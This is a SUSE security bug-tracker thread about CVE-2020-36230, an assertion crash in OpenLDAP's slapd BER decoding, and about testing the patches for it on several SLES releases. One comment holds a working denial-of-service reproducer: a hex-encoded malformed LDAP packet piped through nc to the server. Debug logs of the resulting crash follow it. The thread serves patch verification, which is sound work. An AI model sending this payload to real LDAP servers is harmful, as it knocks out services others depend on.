Bug 1182408 - (CVE-2020-36230) VUL-0: CVE-2020-36230: openldap2: Assertion failure in ber_next_element in decode.c
(CVE-2020-36230)
VUL-0: CVE-2020-36230: openldap2: Assertion failure in ber_next_element in de...
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Normal
: ---
Assigned To: Security Team bot
Security Team bot
https://smash.suse.de/issue/276466/
CVSSv3.1:SUSE:CVE-2020-36230:7.5:(AV:...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2021-02-18 09:34 UTC by Alexander Bergmann
Modified: 2022-05-06 07:26 UTC (History)
5 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Comment 2 jun wang 2021-03-02 13:22:03 UTC
I am testing openldap2 update SUSE:Maintenance:18481:236954, and following the link https://bugs.openldap.org/show_bug.cgi?id=9423#c0, I ran the command BEFORE and AFTER, I got the same failed slapd service:

echo -en '\x30\x82\x01\xe4\x02\x04\x30\x30\x30\x30\x4a\x82\x01\x30\x4f\x3d\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xa7\xb2\xef\xbe\xb2\xef\xb6\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\x2c\x0a\x0a\x0a\x32\x2e\x35\x2e\x34\x2e\x33\x39\x3d\x30\x6b\x30\x30\x30\x06\x30\x30\x30\x30\x30\x30\x30\x06\x31\x30\xb0\x30\x30\x30\x18\x18\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x38\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x03\x03\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30' | nc localhost 1389

# systemctl status slapd.service                                                                                              
● slapd.service - OpenLDAP Server Daemon
   Loaded: loaded (/usr/lib/systemd/system/slapd.service; disabled; vendor preset: disabled)
   Active: failed (Result: signal) since Tue 2021-03-02 21:15:19 CST; 1s ago
  Process: 31803 ExecStart=/usr/lib/openldap/start (code=exited, status=0/SUCCESS)
 Main PID: 31815 (code=killed, signal=ABRT)

Mar 02 21:15:14 linux-zeaz slapd[31803]: looking for plugins in '/usr/lib64/sasl2', failed to open directory, er>
Mar 02 21:15:14 linux-zeaz slapd[31803]: @(#) $OpenLDAP: slapd 2.4.46 $
                                                 opensuse-buildservice@opensuse.org
Mar 02 21:15:15 linux-zeaz slapd[31803]: looking for plugins in '/usr/lib64/sasl2', failed to open directory, er>
Mar 02 21:15:15 linux-zeaz slapd[31815]: slapd starting
Mar 02 21:15:15 linux-zeaz start[31803]: Starting ldap-server
Mar 02 21:15:15 linux-zeaz systemd[1]: Started OpenLDAP Server Daemon.
Mar 02 21:15:19 linux-zeaz slapd[31815]: conn=1000 fd=11 ACCEPT from IP=[::1]:39884 (IP=[::]:389)
Mar 02 21:15:19 linux-zeaz systemd[1]: slapd.service: Main process exited, code=killed, status=6/ABRT
Mar 02 21:15:19 linux-zeaz systemd[1]: slapd.service: Unit entered failed state.
Mar 02 21:15:19 linux-zeaz systemd[1]: slapd.service: Failed with result 'signal'.

is this expected ? this is a security update, I understand it a little hard.
Comment 4 Swamp Workflow Management 2021-03-03 20:18:54 UTC
SUSE-SU-2021:0693-1: An update that fixes 11 vulnerabilities is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
SUSE OpenStack Cloud Crowbar 9 (src):    openldap2-2.4.41-18.83.1
SUSE OpenStack Cloud Crowbar 8 (src):    openldap2-2.4.41-18.83.1
SUSE OpenStack Cloud 9 (src):    openldap2-2.4.41-18.83.1
SUSE OpenStack Cloud 8 (src):    openldap2-2.4.41-18.83.1
SUSE OpenStack Cloud 7 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP5 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP4-LTSS (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP3-LTSS (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP3-BCL (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP2-LTSS (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP2-BCL (src):    openldap2-2.4.41-18.83.1
HPE Helion Openstack 8 (src):    openldap2-2.4.41-18.83.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 5 Swamp Workflow Management 2021-03-03 20:23:33 UTC
SUSE-SU-2021:0692-1: An update that fixes 11 vulnerabilities is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP5 (src):    openldap2-2.4.41-39.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src):    openldap2-2.4.41-39.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    openldap2-2.4.41-39.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    openldap2-2.4.41-39.1
SUSE Linux Enterprise Module for Legacy Software 12 (src):    openldap2-2.4.41-39.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 6 jun wang 2021-03-04 07:14:45 UTC
I simply debuged this bug after update on SLES15SP1, and got the output:

# /usr/lib/openldap/start
...
Starting ldap-server+ exec /usr/sbin/slapd -d 3 -h 'ldap:///  ldapi:///' -f /etc/openldap/slapd.conf -u ldap -g ldap -o slp=off
...
60408612 slap_listener_activate(8): 
60408612 >>> slap_listener(ldap:///)
60408612 connection_get(13): got connid=1000
60408612 connection_read(13): checking for input on id=1000
ber_get_next
ldap_read: want=8, got=8
  0000:  30 82 01 e4 02 04 30 30                            0.....00          
ldap_read: want=480, got=480
  0000:  30 30 4a 82 01 30 4f 3d  ef be b2 ef be b2 ef be   00J..0O=........  
  0010:  b2 ef be b2 ef be b2 ef  be b2 ef a7 b2 ef be b2   ................  
  0020:  ef b6 b2 ef be b2 ef be  b2 ef be b2 ef be b2 ef   ................  
  0030:  be b2 ef be b2 ef be b2  2c 0a 0a 0a 32 2e 35 2e   ........,...2.5.  
  0040:  34 2e 33 39 3d 30 6b 30  30 30 06 30 30 30 30 30   4.39=0k000.00000  
  0050:  30 30 06 31 30 b0 30 30  30 18 18 30 30 30 30 30   00.10.000..00000  
  0060:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0070:  30 30 30 30 38 2e 30 30  30 30 30 30 30 30 30 30   00008.0000000000  
  0080:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0090:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  00a0:  30 30 30 30 30 30 30 30  30 30 30 30 30 03 03 30   0000000000000..0  
  00b0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  00c0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  00d0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  00e0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  00f0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0100:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0110:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0120:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0130:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0140:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0150:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0160:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0170:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0180:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0190:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  01a0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  01b0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  01c0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  01d0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
ber_get_next: tag 0x30 len 484 contents:
60408612 op tag 0x4a, time 1614841362
ber_get_next
ldap_read: want=8 error=Resource temporarily unavailable
60408612 conn=1000 op=0 do_delete
ber_scanf fmt (m) ber:
60408612 <= get_ctrls: n=0 rc=0 err=""
60408612 >>> dnPrettyNormal: <O=ᄇᄇᄇᄇᄇᄇ鱗ᄇﶲᄇᄇᄇᄇᄇᄇᄇ,


2.5.4.39=0k000000000010�00000000000000000000000000008.0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000>
slapd: decode.c:686: ber_next_element: Assertion `last != NULL' failed.
Aborted

Does this mean that this bug is not fixed ?
Comment 7 William Brown 2021-03-05 02:01:09 UTC
It may not be. Perhaps there is an issue with the upstream patch. I will investigate early next week (I have another bug to investigate today :( )
Comment 8 jun wang 2021-03-05 02:14:18 UTC
(In reply to William Brown from comment #7)
> It may not be. Perhaps there is an issue with the upstream patch. I will
> investigate early next week (I have another bug to investigate today :( )

Glad to get your reply, and thank you.

And I have another question. The reproduers (included this one) from the bugs in this update SUSE:Maintenance:18499:236986 always abort openldap service on SLES11SP4 BEFORE and AFTER update, if posibly, please help to investigate this issue.

Thank you again.
Comment 9 William Brown 2021-03-08 02:35:42 UTC
I have been able to reproduce, I will attempt to investigate further.
Comment 10 William Brown 2021-03-08 02:52:19 UTC
Okay I think the issue is you may not have updated libldap. I hit the same issue on my system where libldap has the fix but it wasn't updated.

Can you confirm the version of libldap you are using?
Comment 11 jun wang 2021-03-08 03:07:34 UTC
(In reply to William Brown from comment #10)
> Okay I think the issue is you may not have updated libldap. I hit the same
> issue on my system where libldap has the fix but it wasn't updated.
> 
> Can you confirm the version of libldap you are using?

Yes, you are right. I missed to update libldap:

# rpm -qa | grep libldap                                                                                                      
libldap-2_4-2-32bit-2.4.46-9.48.1.x86_64
libldap-2_4-2-2.4.46-9.31.1.x86_64
libldapcpp1-0.3.1-1.33.x86_64
libldap-data-2.4.46-9.48.1.noarch

and make sure this issue was fixed after updating libldap.

thank you for your help. And could you know why the reproducers don't work on SLES11SP4 ?
Comment 12 William Brown 2021-03-08 03:21:07 UTC
As in, on sle11sp4 you can not cause the crash on the older version?
Comment 13 jun wang 2021-03-08 03:44:09 UTC
(In reply to William Brown from comment #12)
> As in, on sle11sp4 you can not cause the crash on the older version?

ON sles11sp4, openldap service crashed BEFORE and AFTER update. These reproducers can't work on sles11sp4 ?
Comment 14 William Brown 2021-03-08 03:45:33 UTC
(In reply to jun wang from comment #13)
> (In reply to William Brown from comment #12)
> > As in, on sle11sp4 you can not cause the crash on the older version?
> 
> ON sles11sp4, openldap service crashed BEFORE and AFTER update. These
> reproducers can't work on sles11sp4 ?

I don't understand? You're saying it both crashed but also the reproducers can't work? What's going on? Again, have you checked libldap is updated?
Comment 15 jun wang 2021-03-08 04:03:49 UTC
(In reply to William Brown from comment #14)
> > ON sles11sp4, openldap service crashed BEFORE and AFTER update. These
> > reproducers can't work on sles11sp4 ?
> 
> I don't understand? You're saying it both crashed but also the reproducers
> can't work? What's going on? Again, have you checked libldap is updated?

I mean that both(BEFORE and AFTER) crashed, reproducers shall work. Yes, I checked the version libldap, it was updated: libldap-2_4-2-2.4.26-0.74.22.1

this is the output on sles11sp4 after update, maybe it is useful for you.

# exec /opt/suse/lib/openldap/slapd -h 'ldap:///  ' -f /etc/openldap/slapd.conf -u ldap -g ldap -o slp=on -d 3
...
slapd starting
slap_listener_activate(8): 
>>> slap_listener(ldap:///)
connection_get(12): got connid=1000
connection_read(12): checking for input on id=1000
ber_get_next
ldap_read: want=8, got=8
  0000:  30 82 01 e4 02 04 30 30                            0.....00          
ldap_read: want=480, got=480
  0000:  30 30 4a 82 01 30 4f 3d  ef be b2 ef be b2 ef be   00J..0O=........  
  0010:  b2 ef be b2 ef be b2 ef  be b2 ef a7 b2 ef be b2   ................  
  0020:  ef b6 b2 ef be b2 ef be  b2 ef be b2 ef be b2 ef   ................  
  0030:  be b2 ef be b2 ef be b2  2c 0a 0a 0a 32 2e 35 2e   ........,...2.5.  
  0040:  34 2e 33 39 3d 30 6b 30  30 30 06 30 30 30 30 30   4.39=0k000.00000  
  0050:  30 30 06 31 30 b0 30 30  30 18 18 30 30 30 30 30   00.10.000..00000  
  0060:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0070:  30 30 30 30 38 2e 30 30  30 30 30 30 30 30 30 30   00008.0000000000  
  0080:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0090:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  00a0:  30 30 30 30 30 30 30 30  30 30 30 30 30 03 03 30   0000000000000..0  
  00b0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  00c0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  00d0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  00e0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  00f0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0100:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0110:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0120:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0130:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0140:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0150:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0160:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0170:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0180:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0190:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  01a0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  01b0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  01c0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  01d0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
ber_get_next: tag 0x30 len 484 contents:
op tag 0x4a, time 1615176013
ber_get_next
ldap_read: want=8 error=Resource temporarily unavailable
conn=1000 op=0 do_delete
ber_scanf fmt (m) ber:
<= get_ctrls: n=0 rc=0 err=""
>>> dnPrettyNormal: <O=ᄇᄇᄇᄇᄇᄇ鱗ᄇﶲᄇᄇᄇᄇᄇᄇᄇ,


2.5.4.39=0k000000000010�00000000000000000000000000008.0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000>
slapd: decode.c:686: ber_next_element: Assertion `last != ((void *)0)' failed.
Comment 16 Swamp Workflow Management 2021-03-08 20:19:59 UTC
SUSE-SU-2021:0723-1: An update that fixes 11 vulnerabilities is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
SUSE Manager Server 4.0 (src):    openldap2-2.4.46-9.48.1
SUSE Manager Retail Branch Server 4.0 (src):    openldap2-2.4.46-9.48.1
SUSE Manager Proxy 4.0 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server for SAP 15-SP1 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server for SAP 15 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server 15-SP1-LTSS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server 15-SP1-BCL (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server 15-LTSS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Legacy Software 15-SP3 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Legacy Software 15-SP2 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Development Tools 15-SP3 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Development Tools 15-SP2 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Basesystem 15-SP2 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise High Performance Computing 15-LTSS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise High Performance Computing 15-ESPOS (src):    openldap2-2.4.46-9.48.1
SUSE Enterprise Storage 6 (src):    openldap2-2.4.46-9.48.1
SUSE CaaS Platform 4.0 (src):    openldap2-2.4.46-9.48.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 22 jun wang 2021-03-10 08:04:45 UTC
Hi William,

I updated all new packages on SLES11SP4:

# rpm -q compat-libldap-2_3-0 libldap-2_4-2 libldap-2_4-2-32bit libldap-openssl1-2_4-2 libldap-openssl1-2_4-2-32bit libldap-openssl1-2_4-2-x86 openldap2 openldap2-back-meta openldap2-client openldap2-client-openssl1 openldap2-openssl1
compat-libldap-2_3-0-2.3.37-2.74.22.1
libldap-2_4-2-2.4.26-0.74.22.1
libldap-2_4-2-32bit-2.4.26-0.74.22.1
libldap-openssl1-2_4-2-2.4.26-0.74.22.1
libldap-openssl1-2_4-2-32bit-2.4.26-0.74.22.1
package libldap-openssl1-2_4-2-x86 is not installed
openldap2-2.4.26-0.74.22.1
openldap2-back-meta-2.4.26-0.74.22.1
openldap2-client-2.4.26-0.74.22.1
openldap2-client-openssl1-2.4.26-0.74.22.1
openldap2-openssl1-2.4.26-0.74.22.1

# ldd /usr/lib/openldap/slapd 
        linux-vdso.so.1 =>  (0x00007ffd93ea6000)
        libldap_r-2.4.so.2 => /usr/lib64/libldap_r-2.4.so.2 (0x00007f66123df000)
        liblber-2.4.so.2 => /usr/lib64/liblber-2.4.so.2 (0x00007f66121d0000)
        libltdl.so.7 => /usr/lib64/libltdl.so.7 (0x00007f6611fc6000)
        libdb-4.5.so => /usr/lib64/libdb-4.5.so (0x00007f6611c8e000)
        libslp.so.1 => /usr/lib64/libslp.so.1 (0x00007f6611a75000)
        libm.so.6 => /lib64/libm.so.6 (0x00007f66117fa000)
        libnsl.so.1 => /lib64/libnsl.so.1 (0x00007f66115e2000)
        libsasl2.so.2 => /usr/lib64/libsasl2.so.2 (0x00007f66113c7000)
        libdl.so.2 => /lib64/libdl.so.2 (0x00007f66111c3000)
        libssl.so.0.9.8 => /usr/lib64/libssl.so.0.9.8 (0x00007f6610f6b000)
        libcrypto.so.0.9.8 => /usr/lib64/libcrypto.so.0.9.8 (0x00007f6610bc8000)
        libcrypt.so.1 => /lib64/libcrypt.so.1 (0x00007f661098d000)
        libresolv.so.2 => /lib64/libresolv.so.2 (0x00007f6610776000)
        libwrap.so.0 => /lib64/libwrap.so.0 (0x00007f661056b000)
        libpthread.so.0 => /lib64/libpthread.so.0 (0x00007f661034e000)
        libc.so.6 => /lib64/libc.so.6 (0x00007f660ffd2000)
        /lib64/ld-linux-x86-64.so.2 (0x00007f66128bf000)
        libz.so.1 => /lib64/libz.so.1 (0x00007f660fdbc000)

# rpm -qf /usr/lib64/libldap_r-2.4.so.2
libldap-2_4-2-2.4.26-0.74.22.1


but openldap service still crashed with the reproducer from this bug:
(reproducer from https://bugs.openldap.org/show_bug.cgi?id=9423)

# exec /usr/lib/openldap/slapd -h 'ldap:///  ' -f /etc/openldap/slapd.conf -u ldap -g ldap -o slp=on -d 3 2>&1 | tee openldap2.log
...
2.5.4.39=0k00000000001000000000000000000000000000008.0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000>
slapd: decode.c:686: ber_next_element: Assertion `last != ((void *)0)' failed.

only bug#1182408 and bug#1182411 still crashed after updating all new packages, and make sure the other bugs were fixed.

please login "homer" to check this issue.
Comment 23 William Brown 2021-03-12 02:43:54 UTC
Sorry, my key is no longer on this system. I can't login. Can you re-add it?
Comment 24 jun wang 2021-03-12 03:03:25 UTC
(In reply to William Brown from comment #23)
> Sorry, my key is no longer on this system. I can't login. Can you re-add it?

I added your key into the remote host, please have a try.
Comment 25 William Brown 2021-03-12 03:19:58 UTC
homer:~ # rpm -q --changelog libldap-2_4-2  | less
homer:~ #


It's still the wrong version of the package. Changelog here shows this build is from june 2020, not feb 2021.
Comment 26 William Brown 2021-03-12 04:04:55 UTC
Now I'm even more confused. In sle 11 sp4 this should be based on openldap 2.3, not 2.4. How did you get 2.4 packages on there? 

I think this is an IBS problem, not a packaging one at this point sorry.
Comment 29 Swamp Workflow Management 2021-03-14 17:33:37 UTC
openSUSE-SU-2021:0408-1: An update that fixes 11 vulnerabilities is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
openSUSE Leap 15.2 (src):    openldap2-2.4.46-lp152.14.18.1
Comment 33 jun wang 2021-03-18 07:57:00 UTC
# ldd /usr/lib/openldap/slapd                                                                                                 
    linux-vdso.so.1 =>  (0x00007ffc49353000)
    libldap_r-2.4.so.2 => /usr/lib64/libldap_r-2.4.so.2 (0x00007fed217f6000)

# ll /usr/lib64/libldap_r-2.4.so.2.7.1 
-rwxr-xr-x 1 root root 323304 Mar  2 02:25 /usr/lib64/libldap_r-2.4.so.2.7.1

# ll /usr/lib64/libldap-2.4.so.2.7.1 
-rwxr-xr-x 1 root root 298120 Mar  2 02:25 /usr/lib64/libldap-2.4.so.2.7.1

look the above output, there are two ldap libraries libldap-2.4.so.2.7.1 and libldap_r-2.4.so.2.7.1, slapd is using libldap_r-2.4.so.2.7.1, is it possible that slapd should use the library libldap-2.4.so.2.7.1 ?
Comment 52 Swamp Workflow Management 2021-04-16 13:16:15 UTC
SUSE-SU-2021:14700-1: An update that solves 11 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420,1184020
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
SUSE Linux Enterprise Server 11-SP4-LTSS (src):    openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1
SUSE Linux Enterprise Server 11-SECURITY (src):    openldap2-client-openssl1-2.4.26-0.74.26.1
SUSE Linux Enterprise Point of Sale 11-SP3 (src):    openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1
SUSE Linux Enterprise Debuginfo 11-SP3 (src):    openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1, openldap2-client-openssl1-2.4.26-0.74.26.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 53 Marcus Meissner 2021-08-16 11:26:16 UTC
released